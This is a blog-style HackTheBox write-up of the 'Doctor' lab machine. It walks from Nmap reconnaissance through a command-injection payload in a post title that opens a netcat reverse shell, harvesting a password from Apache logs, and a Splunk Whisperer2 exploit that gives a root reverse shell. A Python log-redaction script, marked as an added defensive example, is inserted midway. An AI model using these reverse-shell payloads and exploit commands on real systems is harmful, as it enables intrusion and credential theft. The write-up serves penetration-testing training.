HackTheBox Writeup — Doctor

bwinsight
Mar 11, 2021
Doctor, Linux, 10.10.10.209

Hack The Box is an online platform to test and advance your skills in penetration testing and cyber security.

Reconnaissance

Service enumeration with Nmap (TCP scan on all ports with version detection and scripts):

nmap -sT -p- -A 10.10.10.209

The domain name “doctors.htb” was found on the web application hosted at “http://10.10.10.209”:

Identified “doctors.htb” domain

“http://doctors.htb” was not reachable because the name did not resolve, so the file “/etc/hosts” had to be edited to map the domain to the “10.10.10.209” IP address:

10.10.10.209  doctors.htb
http://doctors.htb — Login page
A new user could be registered on the http://doctors.htb/register page
The account “l33t” had been created

The application allowed the users to create new posts which were visible on the main page.

New posts could be created under the http://doctors.htb/post/new page

Inspecting the HTML source code led to the “http://doctors.htb/archive” page, which returned XML output. The title of the previously created post appeared unsanitized inside the “<title>” element, which suggested that the application was vulnerable to Server Side Template Injection (SSTI): an attacker could insert a malicious payload into the template, which is then executed on the server side.

Exploitation

After several attempts, it was determined that the Netcat Traditional binary (nc.traditional) was available on the target.

Launching Netcat reverse shell on the targeted host:

nc.traditional -e /bin/sh [IPADDR] [PORT]

Opening a Netcat listener on the attacker’s host:

nc -nlvp [PORT]

Once the template engine in use had been identified (see Server Side Template Injection attacks), the following payload was injected as the content of a new post:

<img src=http://10.10.14.84/$(nc.traditional$IFS-e$IFS/bin/sh$IFS'10.10.14.84'$IFS'4444')>
New post containing a Netcat reverse shell payload

Once the reverse shell connected, an interactive shell was obtained with Python’s pty module as the “web@doctor” user:

python3 -c 'import pty;pty.spawn("/bin/bash")'
Steps: 1. Netcat listener on the attacker’s host, 2. reverse Netcat payload injection, 3. Python shell migration

User enumeration showed that the current user was a member of the “adm” group, which is used for system monitoring tasks and has read access to the log files. A quick grep for sensitive strings in the logs revealed a password:

grep -R -e 'password' /var/log/
Content of the “/var/log/apache2/backup” file

Identified password: Guitar123
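As an added defensive example (not from the original writeup), the following stdlib-only Python script flags and redacts credentials that ended up in request URLs in Apache access logs, the kind of leak that exposed the password above. The log lines are constructed samples, and the parameter list and password heuristic are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, urlencode

# Constructed Apache combined-log-style lines (not the box's real log file).
SAMPLE_LOG = """\
10.10.14.84 - - [05/Sep/2020:11:17:34 +0200] "GET /reset_password?email=Guitar123 HTTP/1.1" 500 453 "-"
10.10.14.84 - - [05/Sep/2020:11:18:02 +0200] "GET /login?user=alice&password=Summer2020! HTTP/1.1" 200 1215 "-"
10.10.14.84 - - [05/Sep/2020:11:18:10 +0200] "GET /static/main.css?v=3 HTTP/1.1" 200 3321 "-"
10.10.14.84 - - [05/Sep/2020:11:19:44 +0200] "POST /login HTTP/1.1" 302 0 "-"
"""

# Request line inside the quoted part of a combined-log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Assumed list of parameter names that should never appear in a URL.
SECRET_PARAMS = {"password", "passwd", "pass", "pwd", "token", "secret", "apikey", "api_key"}
# Heuristic for values that look like a password regardless of parameter name
# (e.g. a password typed into the wrong field): 8+ chars mixing letters and digits/punctuation.
PASSWORD_LIKE = re.compile(r"^(?=.*[A-Za-z])(?=.*[\d!@#$%^&*_-])\S{8,}$")

def is_secret(name, value):
    return name.lower() in SECRET_PARAMS or bool(PASSWORD_LIKE.match(value))

def find_credential_leaks(log_text):
    """Return (line_no, param_name, value) for every query parameter that looks like a credential."""
    findings = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for name, value in parse_qsl(urlsplit(m.group("target")).query):
            if is_secret(name, value):
                findings.append((line_no, name, value))
    return findings

def redact(log_text):
    """Return the log with credential values replaced, so it can be archived or shared safely."""
    out = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m:
            parts = urlsplit(m.group("target"))
            pairs = [(k, "[REDACTED]" if is_secret(k, v) else v)
                     for k, v in parse_qsl(parts.query, keep_blank_values=True)]
            if pairs:
                target = parts._replace(query=urlencode(pairs, safe="[]")).geturl()
                line = line.replace(m.group("target"), target, 1)
        out.append(line)
    return "\n".join(out) + "\n"
```

Running this over logs before they are copied into world-readable or group-readable backup files, together with keeping credentials out of GET parameters, closes the leak this writeup relied on.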

User enumeration: ls /home; cat /etc/passwd | grep "/home"

Identified user: shaun

Switching to user “shaun” by using the discovered password “Guitar123”:

su shaun
User.txt was obtained

Privilege Escalation

The target was running a vulnerable Splunk Forwarder instance on port 8089. A quick search turned up the Splunk Whisperer2 exploit, which, combined with the “shaun” credentials, could be used to obtain a root shell:

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.84 --username shaun --password Guitar123 --payload "nc.traditional -e /bin/sh '10.10.14.84' '4443'"
Splunk exploit was executed
Reverse shell was created, root.txt obtained
